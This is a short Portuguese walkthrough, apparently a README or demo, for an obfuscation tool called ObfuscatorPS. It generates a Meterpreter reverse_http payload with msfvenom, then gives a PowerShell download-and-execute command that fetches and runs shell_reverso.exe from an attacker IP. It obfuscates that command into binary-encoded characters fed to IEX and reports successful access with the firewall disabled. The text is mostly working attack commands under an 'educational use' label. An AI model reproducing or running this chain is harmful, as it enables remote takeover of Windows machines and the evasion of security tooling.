Exemplo prático de utilização do ObfuscatorPS em um cenário controlado para estudo de ofuscação.
Antes de tudo devemos ter informações cruciais:
- IP das máquinas
- Criação do payload com msfvenom
- Uso do payload no msfconsole (msf6)
- Download e execução do arquivo na máquina Windows
Comando utilizado:
msfvenom -p windows/meterpreter/reverse_http LHOST=172.23.73.245 LPORT=4444 -f exe -o shell_reverso.exe
Abrir o msfconsole e usar o payload:
🎯 Isca pronta.
Comando original:
iwr -Uri http://172.23.73.245/shell_reverso.exe -Outfile shell_reverso.exe; .\shell_reverso.exe
Comando utilizado:
.\obfuscator.ps1 -comand "iwr -Uri http://172.23.73.245/shell_reverso.exe -Outfile shell_reverso.exe; .\shell_reverso.exe" -type binaryResultado:
Execução do comando:
function uYrp($z){$KAL="";foreach($sX in $z){$KAL+=[char][Convert]::ToInt32($sX,2)};return $KAL};IEX (...)
Checkando o msfconsole:
Acesso obtido com sucesso.
O ObfuscatorPS permite mascarar comandos mantendo sua execução, sendo útil para estudo de ofuscação.
Uso apenas para fins educacionais. Obs: Firewall desativado...